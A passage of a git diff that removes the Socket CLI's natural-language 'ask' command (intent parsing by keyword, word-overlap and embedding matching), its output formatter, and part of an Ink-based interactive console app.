- */ -const SEVERITY_KEYWORDS = { - __proto__: null, - critical: ['critical', 'severe', 'urgent', 'blocker'], - high: ['high', 'important', 'major'], - medium: ['medium', 'moderate', 'normal'], - low: ['low', 'minor', 'trivial'], -} as const - -/** - * Environment keywords. - */ -const ENVIRONMENT_KEYWORDS = { - __proto__: null, - production: ['production', 'prod'], - development: ['development', 'dev'], -} as const - -/** - * Normalize query using NLP to handle variations in phrasing. - * Converts verbs to infinitive and nouns to singular for better matching. - */ -function normalizeQuery(query: string): string { - try { - const doc = nlp(query) - - // Normalize verbs to infinitive form: "fixing" → "fix", "scanned" → "scan". - doc.verbs().toInfinitive() - - // Normalize nouns to singular: "vulnerabilities" → "vulnerability". - doc.nouns().toSingular() - - return doc.out('text').toLowerCase() - } catch (_e) { - // Fallback to original query if NLP fails. - return query.toLowerCase() - } -} - -/** - * Lazily load the pre-computed semantic index. - * NO ML models - just word overlap + synonyms (~3KB). - */ -async function loadSemanticIndex() { - if (semanticIndex) { - return semanticIndex - } - - try { - const homeDir = ENV.HOME || ENV.USERPROFILE - if (!homeDir) { - return null - } - const indexPath = path.join( - homeDir, - '.claude/skills/socket-cli/semantic-index.json', - ) - - const content = await fs.readFile(indexPath, 'utf-8') - semanticIndex = JSON.parse(content) - - return semanticIndex - } catch (_e) { - // Semantic index not available - not a critical error. - return null - } -} - -/** - * Extract meaningful words from text (lowercase, >2 chars). - */ -function extractWords(text: string): string[] { - return text - .toLowerCase() - .replace(/[^\w\s-]/g, '') - .split(/\s+/) - .filter(w => w.length > 2) -} - -/** - * Compute word overlap score between query and command. - * Uses Jaccard similarity: |intersection| / |union|. 
- */ -function wordOverlap(queryWords: Set, commandWords: string[]): number { - const commandSet = new Set(commandWords) - const intersection = new Set([...queryWords].filter(w => commandSet.has(w))) - const union = new Set([...queryWords, ...commandWords]) - - return union.size === 0 ? 0 : intersection.size / union.size -} - -/** - * Find best matching command using word overlap + synonym expansion. - * Fast path - NO ML models, pure JavaScript, ~3KB overhead. - */ -async function wordOverlapMatch(query: string): Promise<{ - action: string - confidence: number -} | null> { - const index = await loadSemanticIndex() - if (!index || !index.commands) { - return null - } - - // Extract query words. - const queryWords = new Set(extractWords(query)) - - if (queryWords.size === 0) { - return null - } - - let bestAction = '' - let bestScore = 0 - - // Match against each command's word index. - for (const [commandName, commandData] of Object.entries(index.commands)) { - if ( - !commandData || - typeof commandData !== 'object' || - !('words' in commandData) || - !Array.isArray(commandData.words) - ) { - continue - } - const score = wordOverlap(queryWords, commandData.words) - - if (score > bestScore) { - bestScore = score - bestAction = commandName - } - } - - // Require minimum overlap threshold. - if (bestScore < WORD_OVERLAP_THRESHOLD) { - return null - } - - return { - action: bestAction, - confidence: bestScore, - } -} - -/** - * Lazily load the ONNX embedding pipeline for deep semantic matching. - * Only loads when word-overlap matching has low confidence. - */ -async function getEmbeddingPipeline() { - if (embeddingPipeline) { - return embeddingPipeline - } - - // If we already failed to load, don't try again. - if (embeddingPipelineFailure) { - return null - } - - try { - // TEMPORARILY DISABLED: ONNX Runtime build issues. - // Load our custom MiniLM inference engine. - // This uses direct ONNX Runtime + embedded WASM (no transformers.js). 
- // Note: Model is optional - pattern matching works fine without it. - // const { MiniLMInference } = await import('../../utils/minilm-inference.mts') - // embeddingPipeline = await MiniLMInference.create() - // return embeddingPipeline - - // Temporarily fall back to pattern matching only. - embeddingPipelineFailure = true - return null - } catch (_e) { - // Model not available - silently fall back to pattern matching. - embeddingPipelineFailure = true - return null - } -} - -/** - * Compute cosine similarity between two vectors. - * Since our embeddings are already normalized, this is just dot product. - */ -function cosineSimilarity(a: Float32Array, b: Float32Array): number { - if (a.length !== b.length) { - return 0 - } - - let dotProduct = 0 - for (let i = 0; i < a.length; i++) { - dotProduct += (a[i] ?? 0) * (b[i] ?? 0) - } - - return dotProduct -} - -/** - * Get embedding for a text string using ONNX Runtime. - */ -async function getEmbedding(text: string): Promise { - const model = await getEmbeddingPipeline() - if (!model) { - return null - } - - try { - const result = await model.embed(text) - return result.embedding - } catch (_e) { - // Silently fail - pattern matching will handle the query. - return null - } -} - -/** - * Pre-compute embeddings for all command patterns. 
- */ -async function ensureCommandEmbeddings() { - if (Object.keys(commandEmbeddings).length > 0) { - return - } - - const commandDescriptions = { - __proto__: null, - fix: 'fix vulnerabilities by updating packages to secure versions', - patch: 'apply patches to remove CVEs from code', - optimize: - 'replace dependencies with better alternatives from Socket registry', - package: 'check safety score and rating of a package', - scan: 'scan project for security vulnerabilities and issues', - } as const - - for (const [action, description] of Object.entries(commandDescriptions)) { - if (description) { - // eslint-disable-next-line no-await-in-loop - const embedding = await getEmbedding(description) - if (embedding) { - commandEmbeddings[action] = embedding - } - } - } -} - -/** - * Find best matching command using ONNX embeddings. - * Fallback for when word-overlap has low confidence - slower but more accurate. - */ -async function onnxSemanticMatch(query: string): Promise<{ - action: string - confidence: number -} | null> { - await ensureCommandEmbeddings() - - const queryEmbedding = await getEmbedding(query) - if (!queryEmbedding || Object.keys(commandEmbeddings).length === 0) { - return null - } - - let bestAction = '' - let bestScore = 0 - - for (const [action, embedding] of Object.entries(commandEmbeddings)) { - const similarity = cosineSimilarity(queryEmbedding, embedding) - if (similarity > bestScore) { - bestScore = similarity - bestAction = action - } - } - - // Require minimum 0.5 similarity to use ONNX match. - if (bestScore < 0.5) { - return null - } - - return { - action: bestAction, - confidence: bestScore, - } -} - -/** - * Parse natural language query into structured intent. - */ -export async function parseIntent(query: string): Promise { - // Normalize the query to handle verb tenses, plurals, etc. - const lowerQuery = normalizeQuery(query) - - // Check for dry run. 
- const isDryRun = - lowerQuery.includes('dry run') || lowerQuery.includes('preview') - - // Extract package name from original query (not normalized). - let packageName: string | undefined - const quotedMatch = query.match(/['"]([^'"]+)['"]/) - if (quotedMatch) { - packageName = quotedMatch[1] - } else { - // Try to find package name after "is", "check", "about", "with". - // Must look like a real package (has @, /, or contains common package patterns). - const pkgMatch = query - .toLowerCase() - .match(/(?:is|check|about|with)\s+([a-z0-9-@/]+)/i) - if (pkgMatch) { - const candidate = pkgMatch[1] - // Only accept if it looks like a real package name (not common words). - if ( - candidate && - (candidate.includes('@') || - candidate.includes('/') || - candidate.match(/^[a-z0-9-]+$/)) - ) { - // Reject common command words. - const commonWords = [ - 'scan', - 'fix', - 'patch', - 'optimize', - 'vulnerabilities', - 'issues', - 'problems', - 'alerts', - 'security', - 'safe', - 'check', - ] - if (!commonWords.includes(candidate)) { - packageName = candidate - } - } - } - } - - // Detect severity. - let severity: string | undefined - for (const [level, keywords] of Object.entries(SEVERITY_KEYWORDS)) { - if ( - Array.isArray(keywords) && - keywords.some(kw => lowerQuery.includes(kw)) - ) { - severity = level - break - } - } - - // Detect environment. - let environment: string | undefined - for (const [env, keywords] of Object.entries(ENVIRONMENT_KEYWORDS)) { - if ( - Array.isArray(keywords) && - keywords.some(kw => lowerQuery.includes(kw)) - ) { - environment = env - break - } - } - - // Match against patterns. 
- let bestMatch: { - action: string - command: string[] - explanation: string - confidence: number - score: number - } | null = null - - for (const [action, pattern] of Object.entries(PATTERNS)) { - if (!pattern) { - continue - } - const matchCount = pattern.keywords.filter(kw => - lowerQuery.includes(kw), - ).length - - if (matchCount > 0) { - const confidence = matchCount / pattern.keywords.length - // Priority-weighted score: higher priority patterns win ties. - const score = confidence * (pattern.priority || 1) - - if (!bestMatch || score > bestMatch.score) { - bestMatch = { - action, - command: [...pattern.command], - explanation: pattern.explanation, - confidence, - score, - } - } - } - } - - // Hybrid semantic matching: try multiple strategies if confidence is low. - if (!bestMatch || bestMatch.confidence < PATTERN_MATCH_THRESHOLD) { - // Strategy 1: Fast word-overlap matching (~0ms, 80-90% accuracy). - const wordMatch = await wordOverlapMatch(query) - - if (wordMatch && wordMatch.confidence > (bestMatch?.confidence || 0)) { - // Use word-overlap match. - const pattern = PATTERNS[wordMatch.action as keyof typeof PATTERNS] - if (pattern) { - bestMatch = { - action: wordMatch.action, - command: [...pattern.command], - explanation: pattern.explanation, - confidence: wordMatch.confidence, - score: wordMatch.confidence, - } - } - } - - // Strategy 2: ONNX semantic matching (50-80ms, 95-98% accuracy). - // Only try if still low confidence. - if (!bestMatch || bestMatch.confidence < 0.5) { - const onnxMatch = await onnxSemanticMatch(query) - - if (onnxMatch && onnxMatch.confidence > (bestMatch?.confidence || 0)) { - // Use ONNX semantic match. 
- const pattern = PATTERNS[onnxMatch.action as keyof typeof PATTERNS] - if (pattern) { - bestMatch = { - action: onnxMatch.action, - command: [...pattern.command], - explanation: pattern.explanation, - confidence: onnxMatch.confidence, - score: onnxMatch.confidence, - } - } - } - } - } - - // Default to scan if still no match. - if (!bestMatch) { - bestMatch = { - action: 'scan', - command: ['scan', 'create'], - explanation: 'Scanning your project', - confidence: 0.5, - score: 0.5, - } - } - - // Build final command with modifiers. - const command = [...bestMatch.command] - - // Add package name if detected and command supports it. - if (packageName && bestMatch.action === 'package') { - command.push(packageName) - } - - // Add severity flag. - if (severity && (bestMatch.action === 'fix' || bestMatch.action === 'scan')) { - command.push(`--severity=${severity}`) - } - - // Add environment flag. - if (environment === 'production' && bestMatch.action === 'scan') { - command.push('--prod') - } - - // Add dry run flag for destructive commands. - if ( - isDryRun || - (bestMatch.action === 'fix' && !lowerQuery.includes('execute')) - ) { - command.push('--dry-run') - } - - const result: ParsedIntent = { - action: bestMatch.action, - command, - confidence: bestMatch.confidence, - explanation: bestMatch.explanation, - isDryRun, - } - - if (packageName !== undefined) { - result.packageName = packageName - } - if (severity !== undefined) { - result.severity = severity - } - if (environment !== undefined) { - result.environment = environment - } - - return result -} - -/** - * Read package.json to get context. 
- */ -async function getProjectContext(cwd: string): Promise<{ - hasPackageJson: boolean - dependencies?: Record - devDependencies?: Record -}> { - try { - const pkgPath = path.join(cwd, 'package.json') - const content = await fs.readFile(pkgPath, 'utf8') - const pkg = JSON.parse(content) - return { - hasPackageJson: true, - dependencies: pkg.dependencies || {}, - devDependencies: pkg.devDependencies || {}, - } - } catch (_e) { - return { hasPackageJson: false } - } -} - -/** - * Main handler for ask command. - */ -export async function handleAsk(options: HandleAskOptions): Promise { - const { execute, explain, query } = options - - // Parse the intent. - const intent = await parseIntent(query) - - // Get project context. - const context = await getProjectContext(process.cwd()) - - // Show what we understood. - outputAskCommand({ - query, - intent, - context, - explain, - }) - - // If not executing, just show the command. - if (!execute) { - logger.log('') - logger.log('💡 Tip: Add --execute or -e to run this command directly') - return - } - - // Execute the command. 
- logger.log('') - logger.log('🚀 Executing...') - logger.log('') - - const result = await spawn('socket', intent.command, { - stdio: 'inherit', - cwd: process.cwd(), - }) - - if (result.code !== 0) { - logger.error(`Command failed with exit code ${result.code}`) - // eslint-disable-next-line n/no-process-exit - process.exit(result.code) - } -} diff --git a/packages/cli/src/commands/ask/output-ask.mts b/packages/cli/src/commands/ask/output-ask.mts deleted file mode 100644 index cf5207fb5..000000000 --- a/packages/cli/src/commands/ask/output-ask.mts +++ /dev/null @@ -1,192 +0,0 @@ -import colors from 'yoctocolors-cjs' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -const logger = getDefaultLogger() - -interface OutputAskCommandOptions { - query: string - intent: { - action: string - command: string[] - confidence: number - explanation: string - packageName?: string - severity?: string - environment?: string - isDryRun?: boolean - } - context: { - hasPackageJson: boolean - dependencies?: Record - devDependencies?: Record - } - explain: boolean -} - -/** - * Format the ask command output. - */ -export function outputAskCommand(options: OutputAskCommandOptions): void { - const { context, explain, intent, query } = options - - // Show the query. - logger.log('') - logger.log(colors.bold(colors.magenta('❯ You asked:'))) - logger.log(` "${colors.cyan(query)}"`) - logger.log('') - - // Show interpretation. - logger.log(colors.bold(colors.magenta('🤖 I understood:'))) - logger.log(` ${intent.explanation}`) - - // Show extracted details if present. - const details = [] - if (intent.packageName) { - details.push(`Package: ${colors.cyan(intent.packageName)}`) - } - if (intent.severity) { - const severityColor = - intent.severity === 'critical' || intent.severity === 'high' - ? colors.red - : intent.severity === 'medium' - ? 
colors.yellow - : colors.blue - details.push(`Severity: ${severityColor(intent.severity)}`) - } - if (intent.environment) { - details.push(`Environment: ${colors.green(intent.environment)}`) - } - if (intent.isDryRun) { - details.push(`Mode: ${colors.yellow('dry-run (preview only)')}`) - } - - if (details.length > 0) { - logger.log(` ${details.join(', ')}`) - } - - // Show confidence if low. - if (intent.confidence < 0.6) { - logger.log('') - logger.log( - colors.yellow( - '⚠️ Low confidence - the command might not match your intent exactly', - ), - ) - } - - logger.log('') - - // Show the command. - logger.log(colors.bold(colors.magenta('📝 Command:'))) - logger.log( - ` ${colors.green('$')} socket ${colors.cyan(intent.command.join(' '))}`, - ) - - // Show explanation if requested. - if (explain) { - logger.log('') - logger.log(colors.bold(colors.magenta('💡 Explanation:'))) - logger.log(explainCommand(intent)) - } - - // Show context. - if (context.hasPackageJson && explain) { - logger.log('') - logger.log(colors.bold(colors.magenta('📦 Project Context:'))) - const depCount = Object.keys(context.dependencies || {}).length - const devDepCount = Object.keys(context.devDependencies || {}).length - logger.log(` Dependencies: ${depCount} packages`) - logger.log(` Dev Dependencies: ${devDepCount} packages`) - } -} - -/** - * Explain what the command does. 
- */ -function explainCommand(intent: { - action: string - command: string[] - severity?: string - environment?: string - isDryRun?: boolean -}): string { - const parts = [] - - switch (intent.action) { - case 'scan': - parts.push(' • Creates a new security scan of your project') - parts.push(' • Analyzes all dependencies for vulnerabilities') - parts.push(' • Checks for supply chain attacks, typosquatting, etc.') - if (intent.severity) { - parts.push( - ` • Filters results to show only ${intent.severity} severity issues`, - ) - } - if (intent.environment === 'production') { - parts.push( - ' • Scans only production dependencies (not dev dependencies)', - ) - } - break - - case 'package': - parts.push(' • Checks the security score of a specific package') - parts.push(' • Shows alerts, vulnerabilities, and quality metrics') - parts.push(' • Provides a 0-100 score based on multiple factors') - break - - case 'fix': - parts.push(' • Applies package updates to fix GitHub security alerts') - parts.push(' • Updates vulnerable packages to safe versions') - if (intent.isDryRun) { - parts.push( - ' • Preview mode: shows what would change without making changes', - ) - } else { - parts.push( - ' • WARNING: This will modify your package.json and lockfile', - ) - } - if (intent.severity) { - parts.push(` • Only fixes ${intent.severity} severity issues`) - } - break - - case 'patch': - parts.push(' • Directly patches code to remove CVEs') - parts.push(' • Applies surgical fixes to vulnerable code paths') - parts.push(' • Creates patch files in your project') - if (intent.isDryRun) { - parts.push( - ' • Preview mode: shows available patches without applying them', - ) - } - break - - case 'optimize': - parts.push(' • Replaces dependencies with Socket registry alternatives') - parts.push( - ' • Uses enhanced versions with better security and performance', - ) - parts.push(' • Adds overrides to your package.json') - if (intent.isDryRun) { - parts.push( - ' • Preview mode: shows 
recommendations without making changes', - ) - } - break - - case 'issues': - parts.push(' • Lists all detected issues in your dependencies') - parts.push(' • Shows severity, type, and affected packages') - if (intent.severity) { - parts.push(` • Filtered to ${intent.severity} severity issues only`) - } - break - - default: - parts.push(' • Runs the interpreted command') - } - - return parts.join('\n') -} diff --git a/packages/cli/src/commands/console/InteractiveConsoleApp.tsx b/packages/cli/src/commands/console/InteractiveConsoleApp.tsx deleted file mode 100644 index 68317abcd..000000000 --- a/packages/cli/src/commands/console/InteractiveConsoleApp.tsx +++ /dev/null @@ -1,820 +0,0 @@ -// @ts-nocheck -/** - * @fileoverview Interactive console for Socket CLI with AI-powered natural language processing. - * - * Layout: - * - Header: 6 lines (logo + metadata) - always visible - * - Console: Dynamic height, min 2 lines - scrollable output area - * - Input: Grows upward with Shift+Enter, max (termHeight - 9) - * - Status: 1 line - always visible at bottom - */ - -import { Box, Static, Text, useApp, useInput, useStdout } from 'ink' -import TextInput from 'ink-text-input' -import type React from 'react' -import { - createElement, - memo, - useCallback, - useEffect, - useMemo, - useState, -} from 'react' - -import { getAsciiHeader } from '../../utils/terminal/ascii-header-banner.mts' - -const TOP_SPACER_HEIGHT = 0 // Lines of spacing at top -const HEADER_HEIGHT = 6 // Logo (4) + info lines (2: divider + CLI info) -const MIN_CONSOLE_HEIGHT = 5 // Minimum lines to show in console -const STATUS_HEIGHT = 1 // Status content (1) -const MIN_INPUT_HEIGHT = 1 // Minimum visible lines for input -const MAX_INPUT_HEIGHT_RATIO = 0.4 // Max 40% of terminal height -const _GAP_HEIGHT = 0 // No gaps - boxes touch each other - -// Disable shimmer until Ink rendering issues resolved. 
-const _shouldDisableAnimations = true -const _SHIMMER_INTERVAL = 100 // ms between frames (smooth animation) - -type _FocusArea = 'console' | 'input' - -export interface DiffLine { - type: 'addition' | 'removal' | 'context' - content: string -} - -export interface ConsoleMessage { - text: string - timestamp: Date - diff?: DiffLine[] - dimmed?: boolean // Dim less important messages. -} - -/** - * Create diff lines for package changes (legacy format). - */ -export function createPackageChangeDiff( - changes: { - package: string - before: string - after: string - reason?: string - }[], -): DiffLine[] { - const lines: DiffLine[] = [] - - for (const change of changes) { - // Package name (context). - lines.push({ - content: change.package, - type: 'context', - }) - - // Before version (removal). - lines.push({ - content: ` ${change.before}`, - type: 'removal', - }) - - // After version (addition). - lines.push({ - content: ` ${change.after}`, - type: 'addition', - }) - - // Reason (context). - if (change.reason) { - lines.push({ - content: ` → ${change.reason}`, - type: 'context', - }) - } - - // Spacing. - lines.push({ - content: '', - type: 'context', - }) - } - - return lines -} - -/** - * Create file diff lines from before/after content. - * Shows unified diff format with line numbers and context. - */ -export function createFileDiff( - beforeContent: string, - afterContent: string, - _contextLines = 3, -): DiffLine[] { - const beforeLines = beforeContent.split('\n') - const afterLines = afterContent.split('\n') - const diffLines: DiffLine[] = [] - - // Simple line-by-line diff (for demo purposes). - // In production, use a proper diff algorithm like Myers diff. - const maxLines = Math.max(beforeLines.length, afterLines.length) - - for (let i = 0; i < maxLines; i++) { - const beforeLine = beforeLines[i] - const afterLine = afterLines[i] - - if (beforeLine === afterLine) { - // Context line (unchanged). 
- if (beforeLine !== undefined) { - diffLines.push({ - content: beforeLine, - type: 'context', - }) - } - } else { - // Lines differ - show removal then addition. - if (beforeLine !== undefined) { - diffLines.push({ - content: beforeLine, - type: 'removal', - }) - } - if (afterLine !== undefined) { - diffLines.push({ - content: afterLine, - type: 'addition', - }) - } - } - } - - return diffLines -} - -export interface InteractiveConsoleAppProps { - buildHash?: string - devMode?: boolean - onCommand?: ( - command: string, - addMessage: (textOrMessage: string | ConsoleMessage) => void, - ) => Promise - version?: string -} - -/** - * Header component - renders once, never updates. - */ -const _StaticHeader = memo( - function StaticHeader({ - buildHash: _buildHash, - devMode: _devMode, - version: _version, - }: { - version?: string - buildHash?: string - devMode?: boolean - }): React.ReactElement { - const headerContent = useMemo( - () => getAsciiHeader('console', undefined, false, {}), - [], - ) - - return createElement( - Box, - { flexDirection: 'column', flexShrink: 0, paddingX: 2 }, - createElement(Text, {}, headerContent), - ) - }, - () => true, // Never re-render -) - -/** - * Console output area - simplified. - */ -const _ConsoleOutput = memo(function ConsoleOutput({ - messages, -}: { - messages: ConsoleMessage[] -}): React.ReactElement { - return createElement( - Box, - { - flexDirection: 'column', - flexGrow: 1, - flexShrink: 0, - paddingX: 1, - }, - // Use Static to render messages - prevents re-rendering existing messages (no flicker). - createElement( - Static, - { items: messages }, - (msg: ConsoleMessage, i: number) => { - const elements = [] - - // Main message text with subtle green tint for console feel. - const isCommandOutput = - !msg.text.startsWith('>') && - !msg.text.includes('→') && - !msg.text.includes('✓') && - !msg.text.includes('✗') - elements.push( - createElement( - Text, - { - key: `msg-${i}`, - color: isCommandOutput ? 
'#86EFAC' : undefined, - dimColor: msg.dimmed || false, - }, - msg.text, - ), - ) - - // Render diff if present with line numbers and background highlighting. - if (msg.diff) { - // Calculate max line number width for alignment. - const maxLineNum = msg.diff.length - const lineNumWidth = String(maxLineNum).length - - for (const [diffIdx, line] of msg.diff.entries()) { - const lineNum = (diffIdx + 1).toString().padStart(lineNumWidth, ' ') - let bgColor: string | undefined - let color: string - let dimColor: boolean - let prefix: string - - switch (line.type) { - case 'addition': - bgColor = '#1A3A1A' // Dark green background. - color = '#E0E0E0' // Light gray text (readable on dark green). - prefix = '+' - dimColor = false - break - case 'removal': - bgColor = '#3A1A2A' // Dark pink background. - color = '#E0E0E0' // Light gray text (readable on dark pink). - prefix = '-' - dimColor = false - break - case 'context': - bgColor = undefined // No background for context. - color = '#6B7280' // Dim gray text. - prefix = ' ' - dimColor = true - break - } - - elements.push( - createElement( - Text, - { - key: `diff-${i}-${diffIdx}`, - backgroundColor: bgColor, - color, - dimColor, - }, - ` ${lineNum} ${prefix} ${line.content}`, - ), - ) - } - } - - // Return Box with all elements. - return createElement( - Box, - { key: i, flexDirection: 'column' }, - ...elements, - ) - }, - ), - ) -}) - -/** - * Input area - simplified. - */ -const InputArea = memo( - function InputArea({ - commandHistory, - height: _height, - isFocused, - onHeightChange, - onSubmit, - }: { - commandHistory: string[] - height: number - isFocused: boolean - onHeightChange: (lineCount: number) => void - onSubmit: (command: string) => void - }): React.ReactElement { - // Internal state - isolated from parent. - const [value, setValue] = useState('') - const [historyIndex, setHistoryIndex] = useState(-1) - - // Notify parent of height changes once on mount (always 1 line). 
- useEffect(() => { - onHeightChange(1) - // eslint-disable-next-line react-hooks/exhaustive-deps - }, [onHeightChange]) - - // Handle up/down arrow navigation for command history. - useInput((_input, key) => { - // Only accept input when this area is focused. - if (!isFocused) { - return - } - - // Up arrow: Navigate backward in history. - if (key.upArrow) { - if (commandHistory.length > 0) { - const newIndex = historyIndex + 1 - if (newIndex < commandHistory.length) { - setHistoryIndex(newIndex) - const historicalCommand = - commandHistory[commandHistory.length - 1 - newIndex]! - setValue(historicalCommand) - } - } - return - } - - // Down arrow: Navigate forward in history. - if (key.downArrow) { - if (historyIndex > 0) { - const newIndex = historyIndex - 1 - setHistoryIndex(newIndex) - const historicalCommand = - commandHistory[commandHistory.length - 1 - newIndex]! - setValue(historicalCommand) - } else if (historyIndex === 0) { - setHistoryIndex(-1) - setValue('') - } - return - } - }) - - // Handle command submission. - const handleSubmit = useCallback( - (submittedValue: string) => { - const command = submittedValue.trim() - if (command) { - onSubmit(command) - setHistoryIndex(-1) - setValue('') - } - }, - [onSubmit], - ) - - return createElement( - Box, - { - borderBottom: true, - borderColor: isFocused ? '#7B5FBF' : '#3F3F3F', - borderLeft: true, - borderRight: true, - borderStyle: 'single', - borderTop: true, - flexDirection: 'row', - flexShrink: 0, - paddingX: 1, - }, - createElement(Text, { color: isFocused ? '#B0B0B0' : '#5A5A5A' }, '> '), - isFocused - ? createElement(TextInput, { - onChange: setValue, - onSubmit: handleSubmit, - value, - }) - : createElement( - Text, - { color: isFocused ? '#B0B0B0' : '#5A5A5A' }, - value, - ), - ) - }, - (prevProps, nextProps) => prevProps.isFocused === nextProps.isFocused, // Re-render if focus state changes -) - -/** - * Readonly gray input area for displaying latest message. 
- */ -function _InputAreaGray({ message }: { message: string }): React.ReactElement { - const [displayMessage, setDisplayMessage] = useState(message) - - useEffect(() => { - setDisplayMessage(message) - }, [message]) - - return createElement( - Box, - { - borderBottom: true, - borderColor: '#6B7280', - borderLeft: true, - borderRight: true, - borderStyle: 'single', - borderTop: true, - flexDirection: 'row', - flexShrink: 0, - paddingX: 1, - }, - createElement(Text, {}, displayMessage), - ) -} - -/** - * Status bar - shows status and Ctrl+C exit prompt. - */ -const StatusBar = memo( - function StatusBar({ - ctrlCPressed, - }: { - ctrlCPressed: boolean - }): React.ReactElement { - const statusText = ctrlCPressed ? 'Press Ctrl+C again to exit' : '◇ Ready' - const statusColor = ctrlCPressed ? 'gray' : 'gray' - - return createElement( - Box, - { - alignItems: 'flex-start', - flexShrink: 0, - height: 1, - justifyContent: 'flex-start', - paddingX: 1, - }, - createElement( - Text, - { color: statusColor, dimColor: !ctrlCPressed }, - statusText, - ), - ) - }, - (prevProps, nextProps) => prevProps.ctrlCPressed === nextProps.ctrlCPressed, // Re-render if ctrlCPressed changes -) - -/** - * Main interactive console application. 
- */ -const InteractiveConsoleAppComponent = function InteractiveConsoleApp({ - buildHash: _buildHash, - devMode: _devMode, - onCommand, - version: _version, -}: InteractiveConsoleAppProps): React.ReactElement { - const { exit } = useApp() - const { stdout } = useStdout() - - const [commandHistory, setCommandHistory] = useState([]) - const [ctrlCPressed, setCtrlCPressed] = useState(false) - const [ctrlCTimestamp, setCtrlCTimestamp] = useState(0) - const [grayBoxScrollOffset, setGrayBoxScrollOffset] = useState(0) - const [hasExecutedCommand, setHasExecutedCommand] = useState(false) - const [inputLineCount, setInputLineCount] = useState(1) - const [messages, setMessages] = useState([]) - const [focused, setFocused] = useState<'input' | 'gray'>('input') - - // Callback to add messages to console (memoized to prevent creating new function on every render). - const addMessage = useCallback((textOrMessage: string | ConsoleMessage) => { - if (typeof textOrMessage === 'string') { - setMessages(prev => [ - ...prev, - { text: textOrMessage, timestamp: new Date() }, - ]) - } else { - setMessages(prev => [...prev, textOrMessage]) - } - // Reset scroll offset to show latest messages. - setGrayBoxScrollOffset(0) - }, []) - - // Calculate dynamic heights - input grows with content, console shrinks. - // Memoize to prevent recalculation on every render. - const termHeight = useMemo(() => stdout.rows || 30, [stdout.rows]) - - const heights = useMemo(() => { - const maxInputHeight = Math.floor(termHeight * MAX_INPUT_HEIGHT_RATIO) - - // Input height = number of lines (no borders). - const inputHeight = Math.max( - MIN_INPUT_HEIGHT, - Math.min(inputLineCount, maxInputHeight), - ) - - // Total fixed heights. - const fixedHeights = TOP_SPACER_HEIGHT + HEADER_HEIGHT + STATUS_HEIGHT - - // Remaining space for console + input. - const dynamicSpace = termHeight - fixedHeights - - // Console gets remainder after input. 
- const consoleHeight = Math.max( - MIN_CONSOLE_HEIGHT, - dynamicSpace - inputHeight, - ) - - return { consoleHeight, inputHeight } - }, [inputLineCount, termHeight]) - - const { consoleHeight, inputHeight } = heights - - // TODO: Mouse click detection for focus switching. - // Current challenge: When we enable ANSI mouse tracking escape codes, - // the terminal sends mouse events as escape sequences on stdin (e.g., \x1b[<0;17;35M). - // Both our stdin.on('data') handler AND Ink's useInput see the same data. - // Ink doesn't recognize these as mouse events, so it treats them as text input, - // causing escape sequences to appear in the input field. - // - // Potential solutions: - // 1. Fork Ink to add native mouse support - // 2. Use stdin.setRawMode(true) and handle ALL input ourselves (major refactor) - // 3. Pre-filter stdin before Ink sees it (requires patching Node.js stream) - // 4. Use a blessed/blessed-contrib approach with complete terminal control - // - // For now: Use Tab key to switch focus (works perfectly). - // Future: Implement proper mouse support when we have time for the refactor. - - // Callbacks for InputArea (memoized to prevent re-renders). - const handleInputHeightChange = useCallback((lineCount: number) => { - setInputLineCount(prevCount => { - // Only update if actually changed to prevent unnecessary re-renders. - if (prevCount !== lineCount) { - return lineCount - } - return prevCount - }) - }, []) - - const handleInputSubmit = useCallback( - (command: string) => { - // Mark that we've executed a command (show gray box now). - setHasExecutedCommand(true) - - // Handle clear command. - if (command.toLowerCase().trim() === 'clear') { - setMessages([]) - setCommandHistory(prev => [...prev, command]) - return - } - - // Add to history (always append, never mutate). - setCommandHistory(prev => [...prev, command]) - - // Echo command. - addMessage(`> ${command}`) - - // Execute. 
- if (onCommand) { - onCommand(command, addMessage) - } - }, - [onCommand, addMessage], - ) - - // Keyboard input handling. - useInput((input, key) => { - // Tab: Cycle focus between input and gray box. - if (key.tab) { - setFocused(prev => (prev === 'input' ? 'gray' : 'input')) - // Reset scroll offset when switching to grey box. - setGrayBoxScrollOffset(0) - return - } - - // Grey box scrolling with up/down arrows. - if (focused === 'gray') { - const nonEmptyMessages = messages.filter(msg => msg.text.length > 0) - const maxOffset = Math.max(0, nonEmptyMessages.length - 1) - - if (key.upArrow) { - setGrayBoxScrollOffset(prev => Math.min(prev + 1, maxOffset)) - return - } - - if (key.downArrow) { - setGrayBoxScrollOffset(prev => Math.max(prev - 1, 0)) - return - } - } - - // Ctrl+C: First press shows warning, second press exits. - if (key.ctrl && input === 'c') { - const now = Date.now() - - // Second press must be at least 100ms after first (prevent key repeat). - if (ctrlCPressed && now - ctrlCTimestamp >= 100) { - // Second press - exit. - exit() - return - } - - // First press - set state for second press check. - setCtrlCPressed(true) - setCtrlCTimestamp(now) - return - } - - // Reset Ctrl+C state on any other key. - if (ctrlCPressed) { - setCtrlCPressed(false) - } - }) - - // Auto-dismiss Ctrl+C warning after 2 seconds. - useEffect(() => { - if (!ctrlCPressed) { - return - } - - const timeout = setTimeout(() => { - setCtrlCPressed(false) - }, 2000) - - return () => { - clearTimeout(timeout) - } - }, [ctrlCPressed]) - - // Get ASCII header with all version and org info. - const headerContent = useMemo( - () => getAsciiHeader('console', undefined, false, {}), - [], - ) - - // Combine header, welcome messages, and command messages into one Static items array. 
- const headerLines = headerContent.split('\n') - const welcomeLines = [ - ' ', - 'Welcome to Socket CLI interactive mode!', - 'Type commands or use natural language.', - 'Try: "scan", "ls", "whoami", or any socket command', - ' ', - ] - const headerItems = [...headerLines, ...welcomeLines] - - // Messages without wrapping - just show as-is - const wrappedMessages: Array<{ text: string; isCommandOutput: boolean }> = [] - for (const msg of messages) { - const isCommandOutput = - !msg.text.startsWith('>') && - !msg.text.includes('→') && - !msg.text.includes('✓') && - !msg.text.includes('✗') - wrappedMessages.push({ isCommandOutput, text: msg.text }) - } - - const _allItems = [...headerItems, ...wrappedMessages] - - return createElement( - Box, - { flexDirection: 'column', minHeight: 0 }, - - // Console area. - createElement( - Box, - { - flexDirection: 'column', - flexGrow: 1, - flexShrink: 1, - minHeight: 0, - paddingX: 2, - }, - // Header section (logo + welcome). - createElement( - Static, - { items: headerItems }, - (item: string, i: number) => { - const isHeaderLine = i < headerLines.length - const isWelcomeMessage = !isHeaderLine - return createElement( - Text, - { - key: i, - color: isWelcomeMessage ? '#86EFAC' : undefined, - }, - item, - ) - }, - ), - ), - - // Readonly gray input box with command log (shown only after first command executed). - hasExecutedCommand - ? createElement( - Box, - { - borderBottom: true, - 